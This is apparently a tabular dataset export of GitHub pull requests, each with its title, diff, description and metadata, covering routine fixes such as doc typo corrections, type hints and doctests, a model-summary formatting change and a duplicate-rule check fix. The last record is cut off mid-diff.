title
stringlengths 2
169
| diff
stringlengths 235
19.5k
| body
stringlengths 0
30.5k
| url
stringlengths 48
84
| created_at
stringlengths 20
20
| closed_at
stringlengths 20
20
| merged_at
stringlengths 20
20
| updated_at
stringlengths 20
20
| diff_len
float64 101
3.99k
| repo_name
stringclasses 83
values | __index_level_0__
int64 15
52.7k
|
---|---|---|---|---|---|---|---|---|---|---|
Hacktoberfest 2020 - Add typehints and default input for project_euler/problem_25 | diff --git a/project_euler/problem_25/sol1.py b/project_euler/problem_25/sol1.py
index f0228915dc15..c30a74a43cb0 100644
--- a/project_euler/problem_25/sol1.py
+++ b/project_euler/problem_25/sol1.py
@@ -25,7 +25,24 @@
"""
-def fibonacci(n):
+def fibonacci(n: int) -> int:
+ """
+ Computes the Fibonacci number for input n by iterating through n numbers
+ and creating an array of ints using the Fibonacci formula.
+ Returns the nth element of the array.
+
+ >>> fibonacci(2)
+ 1
+ >>> fibonacci(3)
+ 2
+ >>> fibonacci(5)
+ 5
+ >>> fibonacci(10)
+ 55
+ >>> fibonacci(12)
+ 144
+
+ """
if n == 1 or type(n) is not int:
return 0
elif n == 2:
@@ -38,7 +55,21 @@ def fibonacci(n):
return sequence[n]
-def fibonacci_digits_index(n):
+def fibonacci_digits_index(n: int) -> int:
+ """
+ Computes incrementing Fibonacci numbers starting from 3 until the length
+ of the resulting Fibonacci result is the input value n. Returns the term
+ of the Fibonacci sequence where this occurs.
+
+ >>> fibonacci_digits_index(1000)
+ 4782
+ >>> fibonacci_digits_index(100)
+ 476
+ >>> fibonacci_digits_index(50)
+ 237
+ >>> fibonacci_digits_index(3)
+ 12
+ """
digits = 0
index = 2
@@ -49,8 +80,9 @@ def fibonacci_digits_index(n):
return index
-def solution(n):
- """Returns the index of the first term in the Fibonacci sequence to contain
+def solution(n: int = 1000) -> int:
+ """
+ Returns the index of the first term in the Fibonacci sequence to contain
n digits.
>>> solution(1000)
diff --git a/project_euler/problem_25/sol2.py b/project_euler/problem_25/sol2.py
index c98f09b1d316..ed3b54bb351f 100644
--- a/project_euler/problem_25/sol2.py
+++ b/project_euler/problem_25/sol2.py
@@ -25,14 +25,29 @@
"""
-def fibonacci_generator():
+def fibonacci_generator() -> int:
+ """
+ A generator that produces numbers in the Fibonacci sequence
+
+ >>> generator = fibonacci_generator()
+ >>> next(generator)
+ 1
+ >>> next(generator)
+ 2
+ >>> next(generator)
+ 3
+ >>> next(generator)
+ 5
+ >>> next(generator)
+ 8
+ """
a, b = 0, 1
while True:
a, b = b, a + b
yield b
-def solution(n):
+def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
diff --git a/project_euler/problem_25/sol3.py b/project_euler/problem_25/sol3.py
index 4a1d9da76bf7..c66411dc55fc 100644
--- a/project_euler/problem_25/sol3.py
+++ b/project_euler/problem_25/sol3.py
@@ -25,7 +25,7 @@
"""
-def solution(n):
+def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
| ### **Describe your change:**
* [ ] Add an algorithm?
* [x] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [ ] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [x] All new Python files are placed inside an existing directory.
* [x] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [x] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
Related: #2786
| https://api.github.com/repos/TheAlgorithms/Python/pulls/2901 | 2020-10-06T05:20:00Z | 2020-10-07T03:57:25Z | 2020-10-07T03:57:25Z | 2020-10-07T03:57:26Z | 849 | TheAlgorithms/Python | 30,300 |
Fix typos in pt-BR README | diff --git a/README.pt-br.md b/README.pt-br.md
index 67365002e..45a8e22c4 100644
--- a/README.pt-br.md
+++ b/README.pt-br.md
@@ -203,7 +203,7 @@ O Rich pode imprimir [tables](https://rich.readthedocs.io/en/latest/tables.html)
A animação acima foi gerada com o arquivo [table_movie.py](https://github.com/textualize/rich/blob/master/examples/table_movie.py) da pasta de exemplos.
-Veja um exemplo mais simple:
+Veja um exemplo mais simples:
```python
from rich.console import Console
@@ -239,9 +239,9 @@ Que gera o seguinte resultado:
![table](https://github.com/textualize/rich/raw/master/imgs/table.png)
-Observe que o markup é renderizado da mesma for que em `print()` e `log()`. De fato, tudo que é renderizável pelo Rich pode ser incluído nos cabeçalhos ou linhas (até mesmo outras tabelas).
+Observe que o markup é renderizado da mesma que em `print()` e `log()`. Na verdade, tudo que é renderizável pelo Rich pode ser incluído nos cabeçalhos ou linhas (até mesmo outras tabelas).
-A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas para caber na largura do terminal, quebrando o texto em novas linhas quando necessário. Veja a seguir o mesmo exemplo, só que desta vez com um terminal menor do que o tamanho original da tabela:
+A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas para caber na largura do terminal, quebrando o texto em novas linhas quando necessário. Veja o mesmo exemplo a seguir, só que desta vez com um terminal menor do que o tamanho original da tabela:
![table2](https://github.com/textualize/rich/raw/master/imgs/table2.png)
@@ -250,7 +250,7 @@ A classe `Table` é inteligente o suficiente para ajustar o tamanho das colunas
<details>
<summary>Barra de Progresso</summary>
-O Rich consegue renderizar de forma eficiente multiplas barras de [progresso](https://rich.readthedocs.io/en/latest/progress.html) que podem ser usadas para rastrear o estado de processos longos.
+O Rich consegue renderizar de forma eficiente múltiplas [barras de progresso](https://rich.readthedocs.io/en/latest/progress.html) que podem ser usadas para rastrear o estado de processos longos.
Uma forma simples de usar é passando o iterável para a função `track` e iterar normalmente sobre o retorno. Veja o exemplo a seguir:
@@ -261,7 +261,7 @@ for step in track(range(100)):
do_step(step)
```
-Adicionar multiplas barras de progresso também é simples. Veja outro exemplo que existe na documentação:
+Adicionar múltiplas barras de progresso também é simples. Veja outro exemplo que existe na documentação:
![progress](https://github.com/textualize/rich/raw/master/imgs/progress.gif)
@@ -269,14 +269,14 @@ As colunas podem ser configuradas pra mostrar qualquer detalho necessário. As c
![progress](https://github.com/textualize/rich/raw/master/imgs/downloader.gif)
-Para testar isso no seu terminal, use o arquivo [examples/downloader.py](https://github.com/textualize/rich/blob/master/examples/downloader.py) para fazer o download de multiplas URLs simultaneamente, exibindo o progresso de cada download.
+Para testar isso no seu terminal, use o arquivo [examples/downloader.py](https://github.com/textualize/rich/blob/master/examples/downloader.py) para fazer o download de múltiplas URLs simultaneamente, exibindo o progresso de cada download.
</details>
<details>
<summary>Status</summary>
-Em casos em que é dificil de calcular o progresso da tarefa, você pode usar o método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que exibe uma animação de um "spinner" e a mensagem. A animação não impede em nada o uso do `console`. Veja o exemplo a seguir:
+Em casos em que é dificil calcular o progresso da tarefa, você pode usar o método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que exibe uma animação de um "spinner" e a mensagem. A animação não impede em nada o uso do `console`. Veja o exemplo a seguir:
```python
from time import sleep
@@ -311,7 +311,7 @@ O comando acima deve exibir o seguinte no seu terminal:
<details>
<summary>Árvore</summary>
-O Rich pode renderizar [árvores](https://rich.readthedocs.io/en/latest/tree.html) com linhas de identação. Uma árvore é a forma ideal de exibir uma extrutura de arquivos ou qualquer outra apresentação hierárquica de dados.
+O Rich pode renderizar [árvores](https://rich.readthedocs.io/en/latest/tree.html) com linhas de identação. Uma árvore é a forma ideal de exibir uma estrutura de arquivos ou qualquer outra apresentação hierárquica de dados.
Os titulos dos itens da árvore podem ser textos simples ou qualquer coisa que o Rich pode renderizar. Execute o comando a seguir para uma demonstração:
@@ -343,7 +343,7 @@ directory = os.listdir(sys.argv[1])
print(Columns(directory))
```
-O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com/textualize/rich/blob/master/examples/columns.py) formatando em colunas os dados extraidos de uma API:
+O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com/textualize/rich/blob/master/examples/columns.py) formatando em colunas os dados extraídos de uma API:
![columns](https://github.com/textualize/rich/raw/master/imgs/columns.png)
@@ -354,7 +354,7 @@ O screenshot a seguir é do resultado do [exemplo de colunas](https://github.com
O Rich pode renderizar [markdown](https://rich.readthedocs.io/en/latest/markdown.html) e faz um bom trabalho de conversão do formato para o terminal.
-Para renderizar markdowm, importe a classe `Markdown` e instancie com a string que contem o código markdown. Depois, imprima o objeto no console. Por exemplo:
+Para renderizar markdowm, importe a classe `Markdown` e instancie com a string que contém o código markdown. Depois, imprima o objeto no console. Por exemplo:
```python
from rich.console import Console
@@ -418,13 +418,13 @@ Veja o resultado disso no OSX (resultados semelhantes no Linux):
</details>
-Todos os renderizaveis do Rich usam o [Protocolo do Console](https://rich.readthedocs.io/en/latest/protocol.html), que você pode usar para implementar o seu próprio conteúdo Rich.
+Todos os renderizáveis do Rich usam o [Protocolo do Console](https://rich.readthedocs.io/en/latest/protocol.html), que você pode usar para implementar o seu próprio conteúdo Rich.
# Rich para empresas
Disponível como parte da assinatura Tidelift.
-Os mantenedores do Rich e milhares de outros pacotes estão trabalhando com o Tidelift para disponibilizar suporte comercial e manutenção de projetos de código aberto usados nas suas aplicações. Economise tempo, reduza riscos e melhore a saúde do código enquanto paga os mantenedores dos pacotes exatos que você usa. [Mais detalhes.](https://tidelift.com/subscription/pkg/pypi-rich?utm_source=pypi-rich&utm_medium=referral&utm_campaign=enterprise&utm_term=repo)
+Os mantenedores do Rich e milhares de outros pacotes estão trabalhando com o Tidelift para disponibilizar suporte comercial e manutenção de projetos de código aberto usados nas suas aplicações. Economize tempo, reduza riscos e melhore a qualidade do código enquanto paga os mantenedores dos pacotes exatos que você usa. [Mais detalhes.](https://tidelift.com/subscription/pkg/pypi-rich?utm_source=pypi-rich&utm_medium=referral&utm_campaign=enterprise&utm_term=repo)
# Projetos usando Rich
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [x] I accept that @willmcgugan may be pedantic in the code review. :smile:
## Description
Learned today that rich has README files in other languages (from a tweet about polish, I believe) and decided to read the pt-BR version. Spotted a few typos, so prepared this PR. Thanks!
| https://api.github.com/repos/Textualize/rich/pulls/2845 | 2023-03-04T10:56:54Z | 2023-03-04T11:09:57Z | 2023-03-04T11:09:57Z | 2023-03-04T18:47:15Z | 1,955 | Textualize/rich | 48,388 |
Formatted Model Summary | diff --git a/models/ModelBase.py b/models/ModelBase.py
index f841ca6ad..e7ad843bc 100644
--- a/models/ModelBase.py
+++ b/models/ModelBase.py
@@ -231,36 +231,54 @@ def __init__(self, model_path, training_data_src_path=None, training_data_dst_pa
else:
self.sample_for_preview = self.generate_next_sample()
self.last_sample = self.sample_for_preview
+
+ ###Generate text summary of model hyperparameters
+ #Find the longest key name and value string. Used as column widths.
+ width_name = max([len(k) for k in self.options.keys()] + [17]) + 1 # Single space buffer to left edge. Minimum of 17, the length of the longest static string used "Current iteration"
+ width_value = max([len(str(x)) for x in self.options.values()] + [len(str(self.iter)), len(self.get_model_name())]) + 1 # Single space buffer to right edge
+ if not self.device_config.cpu_only: #Check length of GPU names
+ width_value = max([len(nnlib.device.getDeviceName(idx))+1 for idx in self.device_config.gpu_idxs] + [width_value])
+ width_total = width_name + width_value + 2 #Plus 2 for ": "
+
model_summary_text = []
-
- model_summary_text += ["===== Model summary ====="]
- model_summary_text += ["== Model name: " + self.get_model_name()]
- model_summary_text += ["=="]
- model_summary_text += ["== Current iteration: " + str(self.iter)]
- model_summary_text += ["=="]
- model_summary_text += ["== Model options:"]
+ model_summary_text += [f'=={" Model Summary ":=^{width_total}}=='] # Model/status summary
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"Model name": >{width_name}}: {self.get_model_name(): <{width_value}}=='] # Name
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"Current iteration": >{width_name}}: {str(self.iter): <{width_value}}=='] # Iter
+ model_summary_text += [f'=={" "*width_total}==']
+
+ model_summary_text += [f'=={" Model Options ":-^{width_total}}=='] # Model options
+ model_summary_text += [f'=={" "*width_total}==']
for key in self.options.keys():
- model_summary_text += ["== |== %s : %s" % (key, self.options[key])]
-
+ model_summary_text += [f'=={key: >{width_name}}: {str(self.options[key]): <{width_value}}=='] # self.options key/value pairs
+ model_summary_text += [f'=={" "*width_total}==']
+
+ model_summary_text += [f'=={" Running On ":-^{width_total}}=='] # Training hardware info
+ model_summary_text += [f'=={" "*width_total}==']
if self.device_config.multi_gpu:
- model_summary_text += ["== |== multi_gpu : True "]
-
- model_summary_text += ["== Running on:"]
+ model_summary_text += [f'=={"Using multi_gpu": >{width_name}}: {"True": <{width_value}}=='] # multi_gpu
+ model_summary_text += [f'=={" "*width_total}==']
if self.device_config.cpu_only:
- model_summary_text += ["== |== [CPU]"]
+ model_summary_text += [f'=={"Using device": >{width_name}}: {"CPU": <{width_value}}=='] # cpu_only
else:
for idx in self.device_config.gpu_idxs:
- model_summary_text += ["== |== [%d : %s]" % (idx, nnlib.device.getDeviceName(idx))]
-
- if not self.device_config.cpu_only and self.device_config.gpu_vram_gb[0] == 2:
- model_summary_text += ["=="]
- model_summary_text += ["== WARNING: You are using 2GB GPU. Result quality may be significantly decreased."]
- model_summary_text += ["== If training does not start, close all programs and try again."]
- model_summary_text += ["== Also you can disable Windows Aero Desktop to get extra free VRAM."]
- model_summary_text += ["=="]
-
- model_summary_text += ["========================="]
- model_summary_text = "\r\n".join (model_summary_text)
+ model_summary_text += [f'=={"Device index": >{width_name}}: {idx: <{width_value}}=='] # GPU hardware device index
+ model_summary_text += [f'=={"Name": >{width_name}}: {nnlib.device.getDeviceName(idx): <{width_value}}=='] # GPU name
+ vram_str = f'{nnlib.device.getDeviceVRAMTotalGb(idx):.2f}GB' # GPU VRAM - Formated as #.## (or ##.##)
+ model_summary_text += [f'=={"VRAM": >{width_name}}: {vram_str: <{width_value}}==']
+ model_summary_text += [f'=={" "*width_total}==']
+ model_summary_text += [f'=={"="*width_total}==']
+
+ if not self.device_config.cpu_only and self.device_config.gpu_vram_gb[0] <= 2: # Low VRAM warning
+ model_summary_text += ["/!\\"]
+ model_summary_text += ["/!\\ WARNING:"]
+ model_summary_text += ["/!\\ You are using a GPU with 2GB or less VRAM. This may significantly reduce the quality of your result!"]
+ model_summary_text += ["/!\\ If training does not start, close all programs and try again."]
+ model_summary_text += ["/!\\ Also you can disable Windows Aero Desktop to increase available VRAM."]
+ model_summary_text += ["/!\\"]
+
+ model_summary_text = "\n".join (model_summary_text)
self.model_summary_text = model_summary_text
io.log_info(model_summary_text)
| Aligns the model summary output using f-string formatting. The logic structure of the base class has not been changed, only the lines put into `model_summary_text`. Output width is calculated from keys & values and will scale to show a clean summary for any model/platform.
GPU VRAM has been added as an output. Incorrect detection of VRAM is possible in broken environments and GPUs of different sizes can report the same name. Showing it here adds clarity for the user and for issue tickets.
Concatenation changed from "\r\n" to "\n", CRLF end of lines for Windows are handled transparently so using it here caused extra blank lines in the summary txt file.
**Examples:**
Using CUDA + SAE-LIAE
```
============= Model Summary ==============
== ==
== Model name: SAE ==
== ==
== Current iteration: 16 ==
== ==
==----------- Model Options ------------==
== ==
== batch_size: 4 ==
== sort_by_yaw: False ==
== random_flip: True ==
== resolution: 128 ==
== face_type: f ==
== learn_mask: True ==
== optimizer_mode: 1 ==
== archi: liae ==
== ae_dims: 256 ==
== e_ch_dims: 42 ==
== d_ch_dims: 21 ==
== multiscale_decoder: False ==
== ca_weights: False ==
== pixel_loss: False ==
== face_style_power: 0.0 ==
== bg_style_power: 0.0 ==
== apply_random_ct: False ==
== clipgrad: False ==
== ==
==------------- Running On -------------==
== ==
== Device index: 0 ==
== Name: GeForce GTX 1080 ==
== VRAM: 8.00GB ==
== ==
==========================================
```
Colab
```
========== Model Summary ==========
== ==
== Model name: SAE ==
== ==
== Current iteration: 39822 ==
== ==
==-------- Model Options --------==
== ==
== batch_size: 24 ==
== sort_by_yaw: True ==
== random_flip: False ==
== resolution: 128 ==
== face_type: f ==
== learn_mask: True ==
== optimizer_mode: 2 ==
== archi: liae ==
== ae_dims: 222 ==
== e_ch_dims: 34 ==
== d_ch_dims: 16 ==
== multiscale_decoder: True ==
== ca_weights: True ==
== pixel_loss: False ==
== face_style_power: 2.0 ==
== bg_style_power: 1.5 ==
== apply_random_ct: False ==
== clipgrad: True ==
== ==
==--------- Running On ----------==
== ==
== Device index: 0 ==
== Name: Tesla K80 ==
== VRAM: 11.00GB ==
== ==
===================================
```
Using OpenCL + H128
```
=========================== Model Summary ===========================
== ==
== Model name: H128 ==
== ==
== Current iteration: 0 ==
== ==
==------------------------- Model Options -------------------------==
== ==
== batch_size: 4 ==
== sort_by_yaw: False ==
== random_flip: True ==
== lighter_ae: False ==
== pixel_loss: False ==
== ==
==-------------------------- Running On ---------------------------==
== ==
== Device index: 0 ==
== Name: Advanced Micro Devices, Inc. gfx900 (OpenCL) ==
== VRAM: 7.98GB ==
== ==
=====================================================================
```
Using CPU (output trimmed)
```
==------- Running On --------==
== ==
== Using device: CPU ==
== ==
===============================
```
multi_gpu support is retained (output trimmed)
```
==------------- Running On -------------==
== ==
== Using multi_gpu: True ==
== ==
== Device index: 1 ==
== Name: Geforce GTX 1080 ==
== VRAM: 8.00GB ==
== Device index: 2 ==
== Name: Geforce GTX 1080 ==
== VRAM: 8.00GB ==
== ==
==========================================
```
Low VRAM warning (output trimmed)
```
==------------- Running On -------------==
== ==
== Device index: 0 ==
== Name: Geforce GTX 1050 ==
== VRAM: 2.00GB ==
== ==
==========================================
/!\
/!\ WARNING:
/!\ You are using a GPU with 2GB or less VRAM. This may significantly reduce the quality of your result!
/!\ If training does not start, close all programs and try again.
/!\ Also you can disable Windows Aero Desktop to increase available VRAM.
/!\
``` | https://api.github.com/repos/iperov/DeepFaceLab/pulls/348 | 2019-08-16T07:28:55Z | 2019-08-16T14:35:28Z | 2019-08-16T14:35:28Z | 2019-08-23T23:38:26Z | 1,402 | iperov/DeepFaceLab | 33,387 |
Corrected a typo in elasticsearch.ipynb | diff --git a/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb b/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
index 2f8c6a96253558..185811f4f5d7a5 100644
--- a/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
+++ b/docs/extras/modules/data_connection/text_embedding/integrations/elasticsearch.ipynb
@@ -9,7 +9,7 @@
"# Elasticsearch\n",
"Walkthrough of how to generate embeddings using a hosted embedding model in Elasticsearch\n",
"\n",
- "The easiest way to instantiate the `ElasticsearchEmebddings` class it either\n",
+ "The easiest way to instantiate the `ElasticsearchEmbeddings` class it either\n",
"- using the `from_credentials` constructor if you are using Elastic Cloud\n",
"- or using the `from_es_connection` constructor with any Elasticsearch cluster"
],
| Simple typo fix | https://api.github.com/repos/langchain-ai/langchain/pulls/7318 | 2023-07-07T04:34:14Z | 2023-07-07T05:35:32Z | 2023-07-07T05:35:32Z | 2023-07-07T05:35:33Z | 219 | langchain-ai/langchain | 42,915 |
Fixed config.json download to go to user-supplied cache directory | diff --git a/src/transformers/pipelines/__init__.py b/src/transformers/pipelines/__init__.py
index 8ee0137a20b3f..e60035dd5732d 100755
--- a/src/transformers/pipelines/__init__.py
+++ b/src/transformers/pipelines/__init__.py
@@ -782,6 +782,7 @@ def pipeline(
_raise_exceptions_for_gated_repo=False,
_raise_exceptions_for_missing_entries=False,
_raise_exceptions_for_connection_errors=False,
+ cache_dir=model_kwargs.get("cache_dir"),
**hub_kwargs,
)
hub_kwargs["_commit_hash"] = extract_commit_hash(resolved_config_file, commit_hash)
| Before, config.json would end up in the default cache directory. Now everything but version.txt is placed properly, and since it's downloaded when pipeline is imported, fixing that will be more complex.
I ran "pytest --picked"; it generated 3 warnings, none of which seemed to have anything to do with my change.
@Narsil since this is related to pipeline. | https://api.github.com/repos/huggingface/transformers/pulls/30189 | 2024-04-11T15:14:09Z | 2024-04-12T17:03:49Z | 2024-04-12T17:03:49Z | 2024-04-12T18:16:37Z | 154 | huggingface/transformers | 12,063 |
Format and grammar tweak | diff --git a/README.md b/README.md
index 68b6c09..fdbd15b 100644
--- a/README.md
+++ b/README.md
@@ -1805,7 +1805,8 @@ x, y = (0, 1) if True else None, None
((0, 1), None)
```
-Almost every Python programmer would have faced a similar situation.
+Almost every Python programmer has faced a similar situation.
+
2\.
```py
t = ('one', 'two')
| * Tweaked a line break so a section number was correctly formatted
* Tweaked grammar to be slightly more natural
Hello! I started this pull request because the formatting was snafued there, but also made a tiny tweak to the wording when I was there!
Thanks for a very entertaining and educational page. | https://api.github.com/repos/satwikkansal/wtfpython/pulls/59 | 2018-01-27T16:05:11Z | 2018-01-29T10:06:03Z | 2018-01-29T10:06:03Z | 2018-01-29T10:07:06Z | 119 | satwikkansal/wtfpython | 25,847 |
[RLLib] Small parallel iterator doc fix. | diff --git a/doc/source/rllib-concepts.rst b/doc/source/rllib-concepts.rst
index c35190a25b29c..db3e844838fdd 100644
--- a/doc/source/rllib-concepts.rst
+++ b/doc/source/rllib-concepts.rst
@@ -614,7 +614,7 @@ In code, this dataflow can be expressed as the following execution plan, which i
return StandardMetricsReporting(train_op, workers, config)
-As you can see, each step returns an *iterator* over objects (if you're unfamiliar with distributed iterators, see Ray's `parallel iterators documentation <iter.html>`__). The reason it is a ``LocalIterator`` is that, though it is based on a parallel computation, the iterator has been turned into one that can be consumed locally in sequence by the program. A couple other points to note:
+As you can see, each step returns an *iterator* over objects (if you're unfamiliar with distributed iterators, see Ray's `parallel iterators implementation <https://github.com/ray-project/ray/blob/master/python/ray/util/iter.py>`__). The reason it is a ``LocalIterator`` is that, though it is based on a parallel computation, the iterator has been turned into one that can be consumed locally in sequence by the program. A couple other points to note:
- The reason the plan returns an iterator over training results, is that ``trainer.train()`` is pulling results from this iterator to return as the result of the train call.
- The rollout workers have been already created ahead of time in the ``WorkerSet``, so the execution plan function is only defining a sequence of operations over the results of the rollouts.
@@ -624,7 +624,7 @@ These iterators represent the infinite stream of data items that can be produced
Understanding and Debugging Execution Plans
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Execution plans are based on Ray `parallel iterators <iter.html>`__ and can be inspected similarly. For example, suppose you wanted to print out the intermediate data items during training. This can be done by inserting a print function into the dataflow, e.g., for A2C:
+Execution plans are based on Ray `parallel iterators <https://github.com/ray-project/ray/blob/master/python/ray/util/iter.py>`__ and can be inspected similarly. For example, suppose you wanted to print out the intermediate data items during training. This can be done by inserting a print function into the dataflow, e.g., for A2C:
.. code-block:: python
| ## Why are these changes needed?
/iter.html was removed when Ray Dataset documentations were introduced.
Pointing to the source code seems like the best option available at the point.
## Related issue number
N/A
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/18043 | 2021-08-24T15:42:15Z | 2021-08-24T17:57:59Z | 2021-08-24T17:57:58Z | 2021-08-25T11:57:08Z | 540 | ray-project/ray | 19,798 |
ref(rules): Fix dupe check on edit | diff --git a/src/sentry/api/endpoints/project_rule_details.py b/src/sentry/api/endpoints/project_rule_details.py
index 50c2d6246ab17..6855d8f84325f 100644
--- a/src/sentry/api/endpoints/project_rule_details.py
+++ b/src/sentry/api/endpoints/project_rule_details.py
@@ -142,7 +142,7 @@ def put(self, request: Request, project, rule) -> Response:
"actions": data["actions"],
"frequency": data.get("frequency"),
}
- duplicate_rule = find_duplicate_rule(kwargs, project)
+ duplicate_rule = find_duplicate_rule(kwargs, project, rule.id)
if duplicate_rule:
return Response(
{
diff --git a/src/sentry/api/endpoints/project_rule_enable.py b/src/sentry/api/endpoints/project_rule_enable.py
index 14ce44dcf1714..95a0cabb3a489 100644
--- a/src/sentry/api/endpoints/project_rule_enable.py
+++ b/src/sentry/api/endpoints/project_rule_enable.py
@@ -39,7 +39,7 @@ def put(self, request: Request, project, rule_id) -> Response:
status=status.HTTP_400_BAD_REQUEST,
)
- duplicate_rule = find_duplicate_rule(rule.data, project)
+ duplicate_rule = find_duplicate_rule(rule.data, project, rule_id)
if duplicate_rule:
return Response(
{
diff --git a/src/sentry/api/endpoints/project_rules.py b/src/sentry/api/endpoints/project_rules.py
index 52aaedadb823c..5060240b12cd9 100644
--- a/src/sentry/api/endpoints/project_rules.py
+++ b/src/sentry/api/endpoints/project_rules.py
@@ -34,9 +34,11 @@ def pre_save_rule(instance, sender, *args, **kwargs):
clean_rule_data(instance.data.get("actions", []))
-def find_duplicate_rule(rule_data, project):
+def find_duplicate_rule(rule_data, project, rule_id=None):
matchers = [key for key in list(rule_data.keys()) if key not in ("name", "user_id")]
- existing_rules = Rule.objects.filter(project=project, status=ObjectStatus.ACTIVE)
+ existing_rules = Rule.objects.exclude(id=rule_id).filter(
+ project=project, status=ObjectStatus.ACTIVE
+ )
for existing_rule in existing_rules:
keys = 0
matches = 0
diff --git a/tests/sentry/api/endpoints/test_project_rule_details.py b/tests/sentry/api/endpoints/test_project_rule_details.py
index f4dea8dba58f9..1ea7e48d35be2 100644
--- a/tests/sentry/api/endpoints/test_project_rule_details.py
+++ b/tests/sentry/api/endpoints/test_project_rule_details.py
@@ -454,6 +454,43 @@ def test_update_duplicate_rule(self):
== f"This rule is an exact duplicate of '{rule.label}' in this project and may not be created."
)
+ def test_edit_rule(self):
+ """Test that you can edit an alert rule w/o it comparing it to itself as a dupe"""
+ conditions = [
+ {
+ "id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition",
+ }
+ ]
+ actions = [
+ {
+ "targetType": "IssueOwners",
+ "fallthroughType": "ActiveMembers",
+ "id": "sentry.mail.actions.NotifyEmailAction",
+ "targetIdentifier": "",
+ }
+ ]
+ self.create_project_rule(
+ project=self.project, action_match=actions, condition_match=conditions
+ )
+ conditions.append(
+ {
+ "id": "sentry.rules.conditions.event_frequency.EventFrequencyPercentCondition",
+ "interval": "1h",
+ "value": "100",
+ "comparisonType": "count",
+ }
+ )
+ payload = {
+ "name": "hello world",
+ "environment": self.environment.name,
+ "actionMatch": "all",
+ "actions": actions,
+ "conditions": conditions,
+ }
+ self.get_success_response(
+ self.organization.slug, self.project.slug, self.rule.id, status_code=200, **payload
+ )
+
def test_with_environment(self):
payload = {
"name": "hello world",
| In some cases when you edit an alert rule (maybe not immediately after creating it?) it's comparing the rule to itself for the duplicate check, so let's explicitly exclude that id from the comparison. | https://api.github.com/repos/getsentry/sentry/pulls/55361 | 2023-08-29T16:54:41Z | 2023-08-29T17:58:30Z | 2023-08-29T17:58:30Z | 2023-09-14T00:02:52Z | 958 | getsentry/sentry | 44,249 |
✏️ A few tweaks in `docs/de/docs/tutorial/first-steps.md` | diff --git a/docs/de/docs/tutorial/first-steps.md b/docs/de/docs/tutorial/first-steps.md
index 5997f138f0ac3..27ba3ec16795e 100644
--- a/docs/de/docs/tutorial/first-steps.md
+++ b/docs/de/docs/tutorial/first-steps.md
@@ -43,7 +43,7 @@ Diese Zeile zeigt die URL, unter der Ihre Anwendung auf Ihrem lokalen Computer b
Öffnen Sie Ihren Browser unter <a href="http://127.0.0.1:8000" class="external-link" target="_blank">http://127.0.0.1:8000.</a>
-Sie werden folgende JSON-Antwort sehen:
+Sie werden folgende JSON-Response sehen:
```JSON
{"message": "Hello World"}
@@ -81,7 +81,7 @@ Diese Schemadefinition enthält Ihre API-Pfade, die möglichen Parameter, welche
#### Daten-„Schema“
-Der Begriff „Schema“ kann sich auch auf die Form von Daten beziehen, wie z.B. einen JSON-Inhalt.
+Der Begriff „Schema“ kann sich auch auf die Form von Daten beziehen, wie z. B. einen JSON-Inhalt.
In diesem Fall sind die JSON-Attribute und deren Datentypen, usw. gemeint.
@@ -328,6 +328,6 @@ Es gibt viele andere Objekte und Modelle, die automatisch zu JSON konvertiert we
* Importieren Sie `FastAPI`.
* Erstellen Sie eine `app` Instanz.
-* Schreiben Sie einen **Pfadoperation-Dekorator** (wie z.B. `@app.get("/")`).
-* Schreiben Sie eine **Pfadoperation-Funktion** (wie z.B. oben `def root(): ...`).
-* Starten Sie den Entwicklungsserver (z.B. `uvicorn main:app --reload`).
+* Schreiben Sie einen **Pfadoperation-Dekorator** (wie z. B. `@app.get("/")`).
+* Schreiben Sie eine **Pfadoperation-Funktion** (wie z. B. oben `def root(): ...`).
+* Starten Sie den Entwicklungsserver (z. B. `uvicorn main:app --reload`).
| https://api.github.com/repos/tiangolo/fastapi/pulls/10959 | 2024-01-13T11:43:29Z | 2024-01-13T12:16:22Z | 2024-01-13T12:16:22Z | 2024-01-13T18:02:41Z | 505 | tiangolo/fastapi | 23,336 |
|
Add missing import for escape in doc | diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index 86b68f9743..9b4fd7bae2 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
